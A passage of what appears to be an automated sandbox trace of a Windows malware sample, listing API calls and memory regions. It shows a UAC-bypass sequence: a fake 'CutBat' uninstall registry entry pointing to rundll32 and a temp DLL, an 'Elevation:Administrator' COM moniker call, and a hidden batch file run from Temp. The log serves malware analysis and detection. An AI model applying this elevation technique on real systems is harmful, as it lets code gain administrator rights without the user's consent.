(hModule=0x76590000, lpProcName="GlobalUnlock") returned 0x765d9d50 [0045.016] GetProcAddress (hModule=0x76590000, lpProcName="GlobalFree") returned 0x765d9cf9 [0045.016] GetProcAddress (hModule=0x764f0000, lpProcName="RegCreateKeyA") returned 0x764fcd01 [0045.016] GetProcAddress (hModule=0x764f0000, lpProcName="RegSetValueExA") returned 0x765014b3 [0045.017] GetProcAddress (hModule=0x764f0000, lpProcName="RegCloseKey") returned 0x7650469d [0045.017] GetProcAddress (hModule=0x764f0000, lpProcName="RegDeleteKeyA") returned 0x7651a8b7 [0045.017] GetProcAddress (hModule=0x77140000, lpProcName="CoInitialize") returned 0x7715b636 [0045.017] GetProcAddress (hModule=0x77140000, lpProcName="CLSIDFromString") returned 0x7715e599 [0045.017] GetProcAddress (hModule=0x77140000, lpProcName="CoGetObject") returned 0x7719b68d [0045.017] GetProcAddress (hModule=0x76590000, lpProcName="MultiByteToWideChar") returned 0x765e452b [0045.017] GetProcAddress (hModule=0x77140000, lpProcName="CoUninitialize") returned 0x771886d3 [0045.017] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CutBat", phkResult=0xef124 | out: phkResult=0xef124*=0x98) returned 0x0 [0045.018] RegSetValueExA (in: hKey=0x98, lpValueName="szDisplayName", Reserved=0x0, dwType=0x1, lpData="CutBat", cbData=0x6 | out: lpData="CutBat") returned 0x0 [0045.018] RegSetValueExA (in: hKey=0x98, lpValueName="UninstallString", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS", cbData=0x53 | out: lpData="C:\\Windows\\system32\\rundll32.exe C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS") returned 0x0 [0045.018] RegCloseKey (hKey=0x98) returned 0x0 [0045.018] CoInitialize (pvReserved=0x0) returned 0x0 [0045.065] CLSIDFromString (in: lpsz="{F885120E-3789-4fd9-865E-DC9B4A6412D2}", pclsid=0xeef70 | out: pclsid=0xeef70*(Data1=0xf885120e, Data2=0x3789, Data3=0x4fd9, Data4=([0]=0x86, [1]=0x5e, [2]=0xdc, [3]=0x9b, [4]=0x4a, [5]=0x64, [6]=0x12, [7]=0xd2))) returned 0x0 [0045.066] CoGetObject (in: pszName="Elevation:Administrator!new:{FCC74B77-EC3E-4dd8-A80B-008A702075A9}", pBindOptions=0xeef4c, riid=0xeef70*(Data1=0xf885120e, Data2=0x3789, Data3=0x4fd9, Data4=([0]=0x86, [1]=0x5e, [2]=0xdc, [3]=0x9b, [4]=0x4a, [5]=0x64, [6]=0x12, [7]=0xd2)), ppv=0xef1b4 | out: ppv=0xef1b4*=0x299314) returned 0x0 [0047.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x162424, cbMultiByte=6, lpWideCharStr=0xeef88, cchWideChar=50 | out: lpWideCharStr="CutBat") returned 6 [0047.131] ObjectStublessClient3 () [0050.891] CoUninitialize () [0050.895] RegDeleteKeyA (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CutBat") returned 0x0 [0050.896] GetTempPathA (in: nBufferLength=0x800, lpBuffer=0xee9fc | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\") returned 0x25 [0050.896] GetTempFileNameA (in: lpPathName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\", lpPrefixString="iun", uUnique=0x0, lpTempFileName=0xee9fc | out: lpTempFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.tmp" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.tmp")) returned 0x4816 [0050.897] DeleteFileA (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.tmp" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.tmp")) returned 1 [0050.897] CreateFileA (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x138 [0050.898] WriteFile (in: hFile=0x138, lpBuffer=0xed9fc*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0xed9f8, lpOverlapped=0x0 | out: lpBuffer=0xed9fc*, lpNumberOfBytesWritten=0xed9f8*=0xf5, lpOverlapped=0x0) returned 1 [0050.898] CloseHandle (hObject=0x138) returned 1 [0050.899] ShellExecuteA (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat", lpParameters=0x0, lpDirectory=0x0, nShowCmd=0) returned 0x2a [0050.991] RtlInterlockedFlushSList (in: ListHead=0x5ef33f50 | out: ListHead=0x5ef33f50) returned 0x0 [0050.991] GetProcAddress (hModule=0x76590000, lpProcName="FlsFree") returned 0x765e1f61 [0050.992] GetProcAddress (hModule=0x76590000, lpProcName="FlsFree") returned 0x765e1f61 [0050.993] FreeLibrary (hLibModule=0x76590000) returned 1 [0050.994] FreeLibrary (hLibModule=0x76590000) returned 1 Thread: id = 28 os_tid = 0xaf4 Thread: id = 29 os_tid = 0xaf8 [0045.242] GetLastError () returned 0x57 [0045.242] GetProcAddress (hModule=0x76590000, lpProcName="FlsGetValue") returned 0x765e1e16 [0045.242] SetLastError (dwErrCode=0x57) [0045.242] GetLastError () returned 0x57 [0045.242] SetLastError (dwErrCode=0x57) Thread: id = 30 os_tid = 0xafc [0045.247] GetLastError () returned 0x57 [0045.247] SetLastError (dwErrCode=0x57) [0045.247] GetLastError () returned 0x57 [0045.247] SetLastError (dwErrCode=0x57) Thread: id = 31 os_tid = 0xb00 [0045.247] GetLastError () returned 0x57 [0045.247] SetLastError (dwErrCode=0x57) [0045.247] GetLastError () returned 0x57 [0045.247] SetLastError (dwErrCode=0x57) Process: id = "5" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x7eef72e0" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xae4" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 800 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 801 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 802 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 803 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 804 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 805 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 806 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 807 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 808 start_va = 0x1e0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 809 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 810 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 811 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 812 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 813 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 814 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 815 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 816 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 817 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 818 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 819 start_va = 0x6b0000 end_va = 0x78efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 820 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 821 start_va = 0x890000 end_va = 0x894fff entry_point = 0x890000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 822 start_va = 0x8a0000 end_va = 0x149ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 823 start_va = 0x14a0000 end_va = 0x176efff entry_point = 0x14a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 824 start_va = 0x18f0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 825 start_va = 0x5eae0000 end_va = 0x5eb81fff entry_point = 0x5eae1bb3 region_type = mapped_file name = "appwiz.cpl" filename = "\\Windows\\System32\\appwiz.cpl" (normalized: "c:\\windows\\system32\\appwiz.cpl") Region: id = 826 start_va = 0x6ed80000 end_va = 0x6ed87fff entry_point = 0x6ed837b2 region_type = mapped_file name = "osbaseln.dll" filename = "\\Windows\\System32\\osbaseln.dll" (normalized: "c:\\windows\\system32\\osbaseln.dll") Region: id = 827 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 828 start_va = 0x73750000 end_va = 0x7377efff entry_point = 0x7375c7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 829 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 830 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 831 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 832 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 833 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 834 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 835 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 836 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 837 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 838 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 839 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 840 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 841 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 842 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 843 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 844 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 845 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 846 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 847 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 848 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 849 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 850 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 851 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 852 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 853 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 854 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 855 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 856 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 857 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 858 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 859 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 860 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 861 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 862 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 863 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 864 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 32 os_tid = 0xb70 Thread: id = 33 os_tid = 0xb6c Thread: id = 34 os_tid = 0xb68 Thread: id = 35 os_tid = 0xb64 Thread: id = 36 os_tid = 0xb60 Thread: id = 37 os_tid = 0xb5c Thread: id = 38 os_tid = 0xb58 Process: id = "6" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x7eef76c0" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb54" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 865 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 866 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 867 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 868 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 869 start_va = 0x8e0000 end_va = 0x8edfff entry_point = 0x8e178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 870 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 871 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 872 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 873 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 874 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 875 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 876 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 877 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 878 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 879 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 880 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 881 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 882 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 883 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 884 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 885 start_va = 0x76c30000 end_va = 0x76c59fff entry_point = 0x76c312fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 886 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 887 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 888 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 889 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 890 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 891 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 892 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 893 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0xd0000 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\System32\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\rundll32.exe.mui") Region: id = 894 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 895 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 896 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 897 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 898 start_va = 0x370000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 899 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 900 start_va = 0x8f0000 end_va = 0x14effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 901 start_va = 0x5ef10000 end_va = 0x5ef95fff entry_point = 0x5ef1780b region_type = mapped_file name = "tempdebug.dll" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll") Region: id = 902 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 903 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 904 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 905 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 906 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 907 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 908 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 909 start_va = 0x570000 end_va = 0x64efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 910 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 39 os_tid = 0xb78 [0047.201] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0047.201] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.201] GetLastError () returned 0x57 [0047.201] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.202] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.202] GetLastError () returned 0x57 [0047.202] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76590000 [0047.202] GetProcAddress (hModule=0x76590000, 